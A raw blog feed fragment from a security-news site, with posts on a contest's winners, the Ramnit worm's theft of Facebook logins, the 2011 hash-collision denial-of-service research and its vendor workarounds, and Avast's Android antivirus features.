&lt;i&gt;&lt;br /&gt;
&lt;/i&gt;&lt;br /&gt;
&lt;i&gt;Life is not just about how many friends (followers?) you have who can help you reach your goal :) Hope you understand my point.&lt;/i&gt;&lt;br /&gt;
&lt;i&gt;&lt;br /&gt;
&lt;/i&gt;&lt;br /&gt;
&lt;i&gt;Thanks all for your support of this initiative&lt;/i&gt;&lt;br /&gt;
&lt;b&gt;&lt;/b&gt;&lt;br /&gt;
&lt;h4&gt;&lt;b&gt;Winners&lt;/b&gt;&lt;/h4&gt;&lt;br /&gt;
Here are the winners for the contest:&lt;br /&gt;
&lt;br /&gt;
&lt;i&gt;Danial&lt;/i&gt;&lt;br /&gt;
&lt;i&gt;Minhal Mehdi&lt;/i&gt;&lt;br /&gt;
&lt;i&gt;Sumeet Kumar&lt;/i&gt;&lt;br /&gt;
&lt;br /&gt;
Winners are&amp;nbsp;advised&amp;nbsp;to leave their emails. So we can send them the courses.&lt;br /&gt;
&lt;br /&gt;
So guys, take some time to congratulate contest Winners. If you're one of them, hearty congratulations to you. If you're not one of them, don't worry, there are many more contests to come&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/3121270199089759062-4417589348831144439?l=www.rafayhackingarticles.net' alt='' /&gt;&lt;/div&gt;&lt;div class="feedflare"&gt;
&lt;a href="http://feeds.feedburner.com/~ff/HackingAndCracking?a=CC-e8Il1hqA:ce3pU_7wqM8:yIl2AUoC8zA"&gt;&lt;img src="http://feeds.feedburner.com/~ff/HackingAndCracking?d=yIl2AUoC8zA" border="0"&gt;&lt;/img&gt;&lt;/a&gt; &lt;a href="http://feeds.feedburner.com/~ff/HackingAndCracking?a=CC-e8Il1hqA:ce3pU_7wqM8:63t7Ie-LG7Y"&gt;&lt;img src="http://feeds.feedburner.com/~ff/HackingAndCracking?d=63t7Ie-LG7Y" border="0"&gt;&lt;/img&gt;&lt;/a&gt; &lt;a href="http://feeds.feedburner.com/~ff/HackingAndCracking?a=CC-e8Il1hqA:ce3pU_7wqM8:-BTjWOF_DHI"&gt;&lt;img src="http://feeds.feedburner.com/~ff/HackingAndCracking?i=CC-e8Il1hqA:ce3pU_7wqM8:-BTjWOF_DHI" border="0"&gt;&lt;/img&gt;&lt;/a&gt; &lt;a href="http://feeds.feedburner.com/~ff/HackingAndCracking?a=CC-e8Il1hqA:ce3pU_7wqM8:V_sGLiPBpWU"&gt;&lt;img src="http://feeds.feedburner.com/~ff/HackingAndCracking?i=CC-e8Il1hqA:ce3pU_7wqM8:V_sGLiPBpWU" border="0"&gt;&lt;/img&gt;&lt;/a&gt; &lt;a href="http://feeds.feedburner.com/~ff/HackingAndCracking?a=CC-e8Il1hqA:ce3pU_7wqM8:qj6IDK7rITs"&gt;&lt;img src="http://feeds.feedburner.com/~ff/HackingAndCracking?d=qj6IDK7rITs" border="0"&gt;&lt;/img&gt;&lt;/a&gt; &lt;a href="http://feeds.feedburner.com/~ff/HackingAndCracking?a=CC-e8Il1hqA:ce3pU_7wqM8:gIN9vFwOqvQ"&gt;&lt;img src="http://feeds.feedburner.com/~ff/HackingAndCracking?i=CC-e8Il1hqA:ce3pU_7wqM8:gIN9vFwOqvQ" border="0"&gt;&lt;/img&gt;&lt;/a&gt; &lt;a href="http://feeds.feedburner.com/~ff/HackingAndCracking?a=CC-e8Il1hqA:ce3pU_7wqM8:4cEx4HpKnUU"&gt;&lt;img src="http://feeds.feedburner.com/~ff/HackingAndCracking?i=CC-e8Il1hqA:ce3pU_7wqM8:4cEx4HpKnUU" border="0"&gt;&lt;/img&gt;&lt;/a&gt;
&lt;/div&gt;&lt;img src="http://feeds.feedburner.com/~r/HackingAndCracking/~4/CC-e8Il1hqA" height="1" width="1"/&gt;</content><link rel="replies" type="application/atom+xml" href="http://www.rafayhackingarticles.net/feeds/4417589348831144439/comments/default" title="Post Comments" /><link rel="replies" type="text/html" href="http://www.rafayhackingarticles.net/2012/01/winners-announced-december-2011-contest.html#comment-form" title="13 Comments" /><link rel="edit" type="application/atom+xml" href="http://www.blogger.com/feeds/3121270199089759062/posts/default/4417589348831144439?v=2" /><link rel="self" type="application/atom+xml" href="http://www.blogger.com/feeds/3121270199089759062/posts/default/4417589348831144439?v=2" /><link rel="alternate" type="text/html" href="http://feedproxy.google.com/~r/HackingAndCracking/~3/CC-e8Il1hqA/winners-announced-december-2011-contest.html" title="Winners Announced - December 2011 Contest" /><author><name>Rafay Baloch</name><uri>http://www.blogger.com/profile/15944091083959815608</uri><email>noreply@blogger.com</email><gd:image rel="http://schemas.google.com/g/2005#thumbnail" width="21" height="32" src="http://2.bp.blogspot.com/-Oq2sCvNga_8/TkK_2qTfs-I/AAAAAAAABXY/GpgdW28vfHM/s220/226160_10150278468603001_538643000_7900302_426914_n.jpg" /></author><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" url="http://1.bp.blogspot.com/-Yf4kou4LKhI/Tt4XAVimPbI/AAAAAAAABlU/b2_MzMzT6Ms/s72-c/logo_full.png" height="72" width="72" /><thr:total>13</thr:total><feedburner:origLink>http://www.rafayhackingarticles.net/2012/01/winners-announced-december-2011-contest.html</feedburner:origLink></entry><entry gd:etag="W/&quot;CkIGQ3s-eip7ImA9WhRWGU4.&quot;"><id>tag:blogger.com,1999:blog-3121270199089759062.post-1887624285452431341</id><published>2012-01-07T02:02:00.000-08:00</published><updated>2012-01-07T02:02:02.552-08:00</updated><app:edited xmlns:app="http://www.w3.org/2007/app">2012-01-07T02:02:02.552-08:00</app:edited><category scheme="http://www.blogger.com/atom/ns#" term="Hack Facebook" /><title>Facebook Hacked: A Worm Steals More Than 45k Passwords</title><content type="html">&amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp;&amp;nbsp;&lt;a href="http://2.bp.blogspot.com/-bP1RdDEXpew/TteLPDQ6wVI/AAAAAAAABks/huVjfxrgZCQ/s1600/0631255600.jpg" imageanchor="1" style="background-color: white; color: #a46f38; font-family: Verdana; font-size: 12px; line-height: 20px; margin-left: 1em; margin-right: 1em; text-align: center;"&gt;&lt;img border="0" src="http://2.bp.blogspot.com/-bP1RdDEXpew/TteLPDQ6wVI/AAAAAAAABks/huVjfxrgZCQ/s1600/0631255600.jpg" style="border-bottom-width: 0px; border-left-width: 0px; border-right-width: 0px; border-top-width: 0px; padding-bottom: 10px; padding-left: 10px; padding-right: 10px; padding-top: 10px;" /&gt;&lt;/a&gt;&lt;br /&gt;
&lt;br /&gt;
Facebook as you might know has been a victim of malware attacks and hoaxes for a large span of time now, It seems that facebook has been&amp;nbsp;unsuccessful to stop these kind of attacks. A famous worm called&amp;nbsp;Ramnit worm has been actively found in the facebook environment. It is reported by Symantec that this worm is responsible for the theft of more than 45k passwords.&lt;br /&gt;
&lt;br /&gt;
&lt;a name='more'&gt;&lt;/a&gt;&lt;br /&gt;
According to&amp;nbsp;Cyberthreat management site Seculert, most of the stolen credentials were from US, UK and France,&amp;nbsp;Furthermore&amp;nbsp;they have added that over the of these stolen logins were invalid and many of them have reacted correctly by changing their username and passwords.&lt;br /&gt;
&lt;br /&gt;
&lt;b&gt;&lt;i&gt;Bypass two-factor authentication and transaction signing systems, gain remote access to financial institutions, compromise online banking sessions and penetrate several corporate networks&lt;/i&gt;&lt;/b&gt;&lt;br /&gt;
&lt;b&gt;&lt;i&gt;&lt;br /&gt;
&lt;/i&gt;&lt;/b&gt;&lt;br /&gt;
&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="http://4.bp.blogspot.com/-wAd5nqKFbXw/TwgOvVJbnaI/AAAAAAAABn4/K_qP9edr9po/s1600/ramnitovertime+%25281%2529.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="372" src="http://4.bp.blogspot.com/-wAd5nqKFbXw/TwgOvVJbnaI/AAAAAAAABn4/K_qP9edr9po/s640/ramnitovertime+%25281%2529.png" width="640" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;b&gt;&lt;i&gt;&lt;br /&gt;
&lt;/i&gt;&lt;/b&gt;&lt;br /&gt;
&lt;br /&gt;
"Recently, our research lab identified a completely new 'financial' Ramnit variant aimed at stealing Facebook login credentials. Since the Ramnit Facebook C&amp;amp;C URL is visible and accessible it was fairly straightforward to detect that over 45,000 Facebook login credentials have been stolen worldwide, mostly from users in the United Kingdom and France"&lt;br /&gt;
&lt;b&gt;&lt;br /&gt;
&lt;/b&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;object style="height: 390px; width: 640px"&gt;&lt;param name="movie" value="http://www.youtube.com/v/srpbDcHZGss?version=3&amp;feature=player_detailpage"&gt;&lt;param name="allowFullScreen" value="true"&gt;&lt;param name="allowScriptAccess" value="always"&gt;&lt;embed src="http://www.youtube.com/v/srpbDcHZGss?version=3&amp;feature=player_detailpage" type="application/x-shockwave-flash" allowfullscreen="true" allowScriptAccess="always" width="577" height="360"&gt;&lt;/object&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;b&gt;Countermeasures:&lt;/b&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;b&gt;1.&lt;/b&gt; Avoid clicking on any kind of&amp;nbsp;suspicious links.&lt;br /&gt;
&lt;b&gt;2.&lt;/b&gt; Update your Antivirus Right away.&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/3121270199089759062-1887624285452431341?l=www.rafayhackingarticles.net' alt='' /&gt;&lt;/div&gt;&lt;div class="feedflare"&gt;
&lt;a href="http://feeds.feedburner.com/~ff/HackingAndCracking?a=GtHYjiE8cRc:s5_Hk7y_i78:yIl2AUoC8zA"&gt;&lt;img src="http://feeds.feedburner.com/~ff/HackingAndCracking?d=yIl2AUoC8zA" border="0"&gt;&lt;/img&gt;&lt;/a&gt; &lt;a href="http://feeds.feedburner.com/~ff/HackingAndCracking?a=GtHYjiE8cRc:s5_Hk7y_i78:63t7Ie-LG7Y"&gt;&lt;img src="http://feeds.feedburner.com/~ff/HackingAndCracking?d=63t7Ie-LG7Y" border="0"&gt;&lt;/img&gt;&lt;/a&gt; &lt;a href="http://feeds.feedburner.com/~ff/HackingAndCracking?a=GtHYjiE8cRc:s5_Hk7y_i78:-BTjWOF_DHI"&gt;&lt;img src="http://feeds.feedburner.com/~ff/HackingAndCracking?i=GtHYjiE8cRc:s5_Hk7y_i78:-BTjWOF_DHI" border="0"&gt;&lt;/img&gt;&lt;/a&gt; &lt;a href="http://feeds.feedburner.com/~ff/HackingAndCracking?a=GtHYjiE8cRc:s5_Hk7y_i78:V_sGLiPBpWU"&gt;&lt;img src="http://feeds.feedburner.com/~ff/HackingAndCracking?i=GtHYjiE8cRc:s5_Hk7y_i78:V_sGLiPBpWU" border="0"&gt;&lt;/img&gt;&lt;/a&gt; &lt;a href="http://feeds.feedburner.com/~ff/HackingAndCracking?a=GtHYjiE8cRc:s5_Hk7y_i78:qj6IDK7rITs"&gt;&lt;img src="http://feeds.feedburner.com/~ff/HackingAndCracking?d=qj6IDK7rITs" border="0"&gt;&lt;/img&gt;&lt;/a&gt; &lt;a href="http://feeds.feedburner.com/~ff/HackingAndCracking?a=GtHYjiE8cRc:s5_Hk7y_i78:gIN9vFwOqvQ"&gt;&lt;img src="http://feeds.feedburner.com/~ff/HackingAndCracking?i=GtHYjiE8cRc:s5_Hk7y_i78:gIN9vFwOqvQ" border="0"&gt;&lt;/img&gt;&lt;/a&gt; &lt;a href="http://feeds.feedburner.com/~ff/HackingAndCracking?a=GtHYjiE8cRc:s5_Hk7y_i78:4cEx4HpKnUU"&gt;&lt;img src="http://feeds.feedburner.com/~ff/HackingAndCracking?i=GtHYjiE8cRc:s5_Hk7y_i78:4cEx4HpKnUU" border="0"&gt;&lt;/img&gt;&lt;/a&gt;
&lt;/div&gt;&lt;img src="http://feeds.feedburner.com/~r/HackingAndCracking/~4/GtHYjiE8cRc" height="1" width="1"/&gt;</content><link rel="replies" type="application/atom+xml" href="http://www.rafayhackingarticles.net/feeds/1887624285452431341/comments/default" title="Post Comments" /><link rel="replies" type="text/html" href="http://www.rafayhackingarticles.net/2012/01/facebook-hacked-worm-steals-more-than.html#comment-form" title="0 Comments" /><link rel="edit" type="application/atom+xml" href="http://www.blogger.com/feeds/3121270199089759062/posts/default/1887624285452431341?v=2" /><link rel="self" type="application/atom+xml" href="http://www.blogger.com/feeds/3121270199089759062/posts/default/1887624285452431341?v=2" /><link rel="alternate" type="text/html" href="http://feedproxy.google.com/~r/HackingAndCracking/~3/GtHYjiE8cRc/facebook-hacked-worm-steals-more-than.html" title="Facebook Hacked: A Worm Steals More Than 45k Passwords" /><author><name>Rafay Baloch</name><uri>http://www.blogger.com/profile/15944091083959815608</uri><email>noreply@blogger.com</email><gd:image rel="http://schemas.google.com/g/2005#thumbnail" width="21" height="32" src="http://2.bp.blogspot.com/-Oq2sCvNga_8/TkK_2qTfs-I/AAAAAAAABXY/GpgdW28vfHM/s220/226160_10150278468603001_538643000_7900302_426914_n.jpg" /></author><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" url="http://2.bp.blogspot.com/-bP1RdDEXpew/TteLPDQ6wVI/AAAAAAAABks/huVjfxrgZCQ/s72-c/0631255600.jpg" height="72" width="72" /><thr:total>0</thr:total><feedburner:origLink>http://www.rafayhackingarticles.net/2012/01/facebook-hacked-worm-steals-more-than.html</feedburner:origLink></entry><entry gd:etag="W/&quot;DkUAQ3Y-eSp7ImA9WhRWE08.&quot;"><id>tag:blogger.com,1999:blog-3121270199089759062.post-5209020108114360118</id><published>2011-12-31T01:37:00.000-08:00</published><updated>2011-12-31T01:37:22.851-08:00</updated><app:edited xmlns:app="http://www.w3.org/2007/app">2011-12-31T01:37:22.851-08:00</app:edited><category scheme="http://www.blogger.com/atom/ns#" term="Hacking News" /><title>Hashing Denial-Of-Service Attack Leaves More Than Half Of The Internet Vulnerable</title><content type="html">&amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp;&lt;a href="http://2.bp.blogspot.com/-Ts9jezJv0tE/TluO4GZLAqI/AAAAAAAABZk/kJEIkpTMYcw/s1600/DDOS-attack-HackersGarage.jpg" imageanchor="1"&gt;&lt;img border="0" src="http://2.bp.blogspot.com/-Ts9jezJv0tE/TluO4GZLAqI/AAAAAAAABZk/kJEIkpTMYcw/s320/DDOS-attack-HackersGarage.jpg" /&gt;&lt;/a&gt; &lt;br /&gt;
A recent research&amp;nbsp;Alexander&lt;b&gt; “alech” Klink and Julian “zeri” Wälde&lt;/b&gt; shows that more than half of Internet is vulnerable to Hashing Denial of service vulnerability. The HDOS vulnerability exploits the hash tables consuming more than 99% of the CPU usage hence causing a Denial of service attack.&lt;br /&gt;
&lt;br /&gt;
The security researchers demonstrated the &amp;nbsp;HDOS vulnerability at 28th Chaos Communication Congress security conference in Berlin, Germany, Earth, Milky Way. The talk was titled as&amp;nbsp;&lt;b&gt;"Efficient Denial of Service Attacks on Web Application Platforms". &lt;/b&gt;The reaserch shows that most of the web programming languages including&amp;nbsp;PHP, ASP.NET, Java, Python, Ruby, Apache Tomcat&lt;b&gt; (The list goes on and on) &lt;/b&gt;are vulnerable to the HDOS vulnerability&lt;br /&gt;
&lt;a name='more'&gt;&lt;/a&gt;&lt;br /&gt;
&lt;blockquote&gt;PHP 5, Java, ASP.NET as well as V8 are fully vulnerable to this issue and PHP 4, Python and Ruby are partially vulnerable, depending on version or whether the server running the code is a 32-bit or 64-bit machine.&amp;nbsp;&lt;/blockquote&gt;&lt;blockquote&gt;&amp;nbsp;Hash tables are a commonly used data structure in most programming languages," they explained. "Web application servers or platforms commonly parse attacker-controlled POST form data into hash tables automatically, so that they can be accessed by application developers. If the language does not provide a randomized hash function or the application server does not recognize attacks using multi-collisions, an attacker can degenerate the hash table by sending lots of colliding keys.&amp;nbsp;&amp;nbsp;&lt;/blockquote&gt;&lt;blockquote&gt;The algorithmic complexity of inserting n elements into the table then goes to O(n**2), making it possible to exhaust hours of CPU time using a single HTTP request."&lt;/blockquote&gt;&lt;br /&gt;
&lt;b&gt;Demonstration&lt;/b&gt;&lt;br /&gt;
&lt;br /&gt;
The researchers have also posted a &lt;b&gt;&lt;a href="http://mirror.fem-net.de/CCC/28C3/mp4-h264-HQ/28c3-4680-en-effective_dos_attacks_against_web_application_platforms_h264.mp4"&gt;video demonstration&lt;/a&gt;&lt;/b&gt; as a proof of the vulnerability.&lt;br /&gt;
&lt;br /&gt;
&lt;b&gt;Countermeasures&lt;/b&gt;&lt;br /&gt;
&lt;b&gt;&lt;br /&gt;
&lt;/b&gt;&lt;br /&gt;
Mircosoft has also provided the workaround for the asp.net vulnerability, You can &lt;b&gt;find it &lt;a href="http://blogs.technet.com/b/srd/archive/2011/12/27/more-information-about-the-december-2011-asp-net-vulnerability.aspx" rel="no follow"&gt;here&lt;/a&gt;.&lt;/b&gt;&lt;br /&gt;
&lt;br /&gt;
PHP advises to limit the number of &lt;b&gt;different http request parameters&lt;/b&gt;. For this purpose PHP has added a&amp;nbsp;max_input_vars function which gives the flexibility to limit the number of paramters.&lt;br /&gt;
&lt;br /&gt;
Furthur Resources:&lt;br /&gt;
&lt;br /&gt;
If you would like to learn more about the vulnerability, here are some useful links:&lt;br /&gt;
&lt;br /&gt;
&lt;a href="http://www.ocert.org/advisories/ocert-2011-003.html" rel="no follow"&gt;http://www.ocert.org/advisories/ocert-2011-003.html&lt;/a&gt; &lt;br /&gt;
&lt;a href="http://permalink.gmane.org/gmane.comp.security.full-disclosure/83694" rel="no follow"&gt;http://permalink.gmane.org/gmane.comp.security.full-disclosure/83694&lt;/a&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/3121270199089759062-5209020108114360118?l=www.rafayhackingarticles.net' alt='' /&gt;&lt;/div&gt;&lt;div class="feedflare"&gt;
&lt;a href="http://feeds.feedburner.com/~ff/HackingAndCracking?a=68eaMPURvfU:O633M2pWxXQ:yIl2AUoC8zA"&gt;&lt;img src="http://feeds.feedburner.com/~ff/HackingAndCracking?d=yIl2AUoC8zA" border="0"&gt;&lt;/img&gt;&lt;/a&gt; &lt;a href="http://feeds.feedburner.com/~ff/HackingAndCracking?a=68eaMPURvfU:O633M2pWxXQ:63t7Ie-LG7Y"&gt;&lt;img src="http://feeds.feedburner.com/~ff/HackingAndCracking?d=63t7Ie-LG7Y" border="0"&gt;&lt;/img&gt;&lt;/a&gt; &lt;a href="http://feeds.feedburner.com/~ff/HackingAndCracking?a=68eaMPURvfU:O633M2pWxXQ:-BTjWOF_DHI"&gt;&lt;img src="http://feeds.feedburner.com/~ff/HackingAndCracking?i=68eaMPURvfU:O633M2pWxXQ:-BTjWOF_DHI" border="0"&gt;&lt;/img&gt;&lt;/a&gt; &lt;a href="http://feeds.feedburner.com/~ff/HackingAndCracking?a=68eaMPURvfU:O633M2pWxXQ:V_sGLiPBpWU"&gt;&lt;img src="http://feeds.feedburner.com/~ff/HackingAndCracking?i=68eaMPURvfU:O633M2pWxXQ:V_sGLiPBpWU" border="0"&gt;&lt;/img&gt;&lt;/a&gt; &lt;a href="http://feeds.feedburner.com/~ff/HackingAndCracking?a=68eaMPURvfU:O633M2pWxXQ:qj6IDK7rITs"&gt;&lt;img src="http://feeds.feedburner.com/~ff/HackingAndCracking?d=qj6IDK7rITs" border="0"&gt;&lt;/img&gt;&lt;/a&gt; &lt;a href="http://feeds.feedburner.com/~ff/HackingAndCracking?a=68eaMPURvfU:O633M2pWxXQ:gIN9vFwOqvQ"&gt;&lt;img src="http://feeds.feedburner.com/~ff/HackingAndCracking?i=68eaMPURvfU:O633M2pWxXQ:gIN9vFwOqvQ" border="0"&gt;&lt;/img&gt;&lt;/a&gt; &lt;a href="http://feeds.feedburner.com/~ff/HackingAndCracking?a=68eaMPURvfU:O633M2pWxXQ:4cEx4HpKnUU"&gt;&lt;img src="http://feeds.feedburner.com/~ff/HackingAndCracking?i=68eaMPURvfU:O633M2pWxXQ:4cEx4HpKnUU" border="0"&gt;&lt;/img&gt;&lt;/a&gt;
&lt;/div&gt;&lt;img src="http://feeds.feedburner.com/~r/HackingAndCracking/~4/68eaMPURvfU" height="1" width="1"/&gt;</content><link rel="replies" type="application/atom+xml" href="http://www.rafayhackingarticles.net/feeds/5209020108114360118/comments/default" title="Post Comments" /><link rel="replies" type="text/html" href="http://www.rafayhackingarticles.net/2011/12/hashing-denial-of-service-attack-leaves.html#comment-form" title="3 Comments" /><link rel="edit" type="application/atom+xml" href="http://www.blogger.com/feeds/3121270199089759062/posts/default/5209020108114360118?v=2" /><link rel="self" type="application/atom+xml" href="http://www.blogger.com/feeds/3121270199089759062/posts/default/5209020108114360118?v=2" /><link rel="alternate" type="text/html" href="http://feedproxy.google.com/~r/HackingAndCracking/~3/68eaMPURvfU/hashing-denial-of-service-attack-leaves.html" title="Hashing Denial-Of-Service Attack Leaves More Than Half Of The Internet Vulnerable" /><author><name>Rafay Baloch</name><uri>http://www.blogger.com/profile/15944091083959815608</uri><email>noreply@blogger.com</email><gd:image rel="http://schemas.google.com/g/2005#thumbnail" width="21" height="32" src="http://2.bp.blogspot.com/-Oq2sCvNga_8/TkK_2qTfs-I/AAAAAAAABXY/GpgdW28vfHM/s220/226160_10150278468603001_538643000_7900302_426914_n.jpg" /></author><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" url="http://2.bp.blogspot.com/-Ts9jezJv0tE/TluO4GZLAqI/AAAAAAAABZk/kJEIkpTMYcw/s72-c/DDOS-attack-HackersGarage.jpg" height="72" width="72" /><thr:total>3</thr:total><feedburner:origLink>http://www.rafayhackingarticles.net/2011/12/hashing-denial-of-service-attack-leaves.html</feedburner:origLink></entry><entry gd:etag="W/&quot;C0IERng8eSp7ImA9WhRXGE8.&quot;"><id>tag:blogger.com,1999:blog-3121270199089759062.post-3688546292491803874</id><published>2011-12-25T05:58:00.000-08:00</published><updated>2011-12-25T05:58:27.671-08:00</updated><app:edited xmlns:app="http://www.w3.org/2007/app">2011-12-25T05:58:27.671-08:00</app:edited><category scheme="http://www.blogger.com/atom/ns#" term="Hacking News" /><title>Download Free Android Security Software Avast Antivirus</title><content type="html">&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="http://4.bp.blogspot.com/-BOGZHDieKPM/Tvcr0C0u3-I/AAAAAAAABnE/c0GEG5xxi8g/s1600/unnamed.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" src="http://4.bp.blogspot.com/-BOGZHDieKPM/Tvcr0C0u3-I/AAAAAAAABnE/c0GEG5xxi8g/s1600/unnamed.jpg" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;br /&gt;
There is absolutely no doubt that Avast is one of the most famous Antivirus vendor, well known for it's amazing features. Due to recent rise in malware attacks on Android, Lots of different Antivirus have moved their attention towards developing security mechanisms for Android. Same is the case with Avast. Avast has recently launched a&amp;nbsp;Android Antivirus which you can easily use for free.&lt;br /&gt;
&lt;br /&gt;
&lt;a name='more'&gt;&lt;/a&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;b&gt;Description According To AVAST:&lt;/b&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;b&gt;Full-featured Antivirus and Anti-Theft security for your Android phone.&lt;/b&gt;&lt;br /&gt;
&lt;i&gt;&lt;br /&gt;
&lt;/i&gt;&lt;br /&gt;
&lt;i&gt;Protect personal data with automatic virus scans and infected-URL alerts. Stop hackers by adding a firewall (rooted phones). Control anti-theft features with remote SMS commands for: history wipe, phone lock, siren activation, GPS tracking, audio monitoring, and many other useful tools. Your ‘invisible’ app hides itself, making it extremely hard for thieves to find and disable.&amp;nbsp;&lt;/i&gt;&lt;br /&gt;
&lt;i&gt;&lt;br /&gt;
&lt;/i&gt;&lt;br /&gt;
&lt;i&gt;A standalone yet tightly integrated component of avast! Mobile Security, avast! Anti-Theft is the slyest component on the market. Formerly known as Theft Aware, the Anti-Theft portion of avast! Mobile Security has been recommended by leading industry experts that include T-Mobile, N-TV, AndroidPIT, and Android Police.&lt;/i&gt;&lt;br /&gt;
&lt;i&gt;&lt;br /&gt;
&lt;/i&gt;&lt;br /&gt;
&lt;i&gt;Performs on-demand scans of all installed apps and memory card content, as well as on-access scans of apps upon first execution. Options for scheduling scans, virus definition updates, uninstalling apps, deleting files, or reporting a false-positive to our virus lab.&lt;/i&gt;&lt;br /&gt;
&lt;i&gt;&lt;br /&gt;
&lt;/i&gt;&lt;br /&gt;
&lt;b&gt;&lt;i&gt;Privacy Report&lt;/i&gt;&lt;/b&gt;&lt;br /&gt;
&lt;i&gt;&lt;br /&gt;
&lt;/i&gt;&lt;br /&gt;
&lt;i&gt;Scans and displays (grid) access rights and intents of installed apps, identifying potential privacy risks, so you know how much info you are really providing to each app.&lt;/i&gt;&lt;br /&gt;
&lt;i&gt;&lt;br /&gt;
&lt;/i&gt;&lt;br /&gt;
&lt;b&gt;&lt;i&gt;SMS/Call Filtering&lt;/i&gt;&lt;/b&gt;&lt;br /&gt;
&lt;i&gt;&lt;br /&gt;
&lt;/i&gt;&lt;br /&gt;
&lt;i&gt;Filter calls and/or messages from contact list using set parameters based on day(s) of the week, start time, and end time. Blocked calls redirect to voicemail, while blocked messages are stored via filter log. Also possible to block outgoing calls.&lt;/i&gt;&lt;br /&gt;
&lt;i&gt;&lt;br /&gt;
&lt;/i&gt;&lt;br /&gt;
&lt;b&gt;&lt;i&gt;App Manager&lt;/i&gt;&lt;/b&gt;&lt;br /&gt;
&lt;i&gt;&lt;br /&gt;
&lt;/i&gt;&lt;br /&gt;
&lt;i&gt;Similar to Windows Task Manager, it shows a list of running apps and their size (MB), CPU load, used memory, and number of threads and services – with an option to stop or uninstall.&lt;/i&gt;&lt;br /&gt;
&lt;i&gt;&lt;br /&gt;
&lt;/i&gt;&lt;br /&gt;
&lt;b&gt;&lt;i&gt;Web Shield&lt;/i&gt;&lt;/b&gt;&lt;br /&gt;
&lt;i&gt;Part of the avast! WebRep cloud, the avast! Web Shield for Android scans each URL that loads and warns you if the browser loads a malware-infected URL.&lt;/i&gt;&lt;br /&gt;
&lt;i&gt;&lt;br /&gt;
&lt;/i&gt;&lt;br /&gt;
&lt;b&gt;&lt;i&gt;Firewall&lt;/i&gt;&lt;/b&gt;&lt;br /&gt;
&lt;i&gt;&lt;br /&gt;
&lt;/i&gt;&lt;br /&gt;
&lt;i&gt;Add a firewall to stop hackers. Disable an app’s internet access when on WiFi and 3G and roaming mobile networks. (Works only on rooted phones.)&lt;/i&gt;&lt;br /&gt;
&lt;i&gt;avast! Anti-Theft&lt;/i&gt;&lt;br /&gt;
&lt;i&gt;&lt;br /&gt;
&lt;/i&gt;&lt;br /&gt;
&lt;b&gt;&lt;i&gt;App Disguiser&lt;/i&gt;&lt;/b&gt;&lt;br /&gt;
&lt;i&gt;&lt;br /&gt;
&lt;/i&gt;&lt;br /&gt;
&lt;i&gt;After downloading avast! Anti-Theft, user can choose a custom name that disguises the app (e.g. call it “Pinocchio game”) so that it is even harder for thieves to find and remove.&lt;/i&gt;&lt;br /&gt;
&lt;i&gt;&lt;br /&gt;
&lt;/i&gt;&lt;br /&gt;
&lt;b&gt;&lt;i&gt;Stealth Mode&lt;/i&gt;&lt;/b&gt;&lt;br /&gt;
&lt;b&gt;&lt;i&gt;&lt;br /&gt;
&lt;/i&gt;&lt;/b&gt;&lt;br /&gt;
&lt;i&gt;Once anti-theft is enabled, the app icon is hidden in the app tray, leaving no audio or other trace on the target phone – the app is ‘invisible’, making it difficult for thieves to detect or remove.&lt;/i&gt;&lt;br /&gt;
&lt;i&gt;&lt;br /&gt;
&lt;/i&gt;&lt;br /&gt;
&lt;b&gt;&lt;i&gt;Self-Protection&lt;/i&gt;&lt;/b&gt;&lt;br /&gt;
&lt;i&gt;&lt;br /&gt;
&lt;/i&gt;&lt;br /&gt;
&lt;i&gt;Extremely difficult for thieves to remove (especially on rooted phones), Anti-Theft protects itself from uninstall by disguising its components with various self-preservation techniques. On rooted phones it is able to survive hard-resets and can even disable the phone’s USB port.&lt;/i&gt;&lt;br /&gt;
&lt;i&gt;&lt;br /&gt;
&lt;/i&gt;&lt;br /&gt;
&lt;b&gt;&lt;i&gt;Battery Save&lt;/i&gt;&lt;/b&gt;&lt;br /&gt;
&lt;i&gt;&lt;br /&gt;
&lt;/i&gt;&lt;br /&gt;
&lt;i&gt;Anti-Theft only launches itself and runs when it needs to perform tasks. This preserves battery life and makes it very difficult for thieves to shut it down.&lt;/i&gt;&lt;br /&gt;
&lt;i&gt;&lt;br /&gt;
&lt;/i&gt;&lt;br /&gt;
&lt;b&gt;&lt;i&gt;SIM-Card-Change Notification&lt;/i&gt;&lt;/b&gt;&lt;br /&gt;
&lt;i&gt;&lt;br /&gt;
&lt;/i&gt;&lt;br /&gt;
&lt;i&gt;If stolen and a different (unauthorized) SIM card inserted, the phone can lock, activate siren, and send you notification (to remote device) of the phone’s new number and geo-location.&lt;/i&gt;&lt;br /&gt;
&lt;i&gt;&lt;br /&gt;
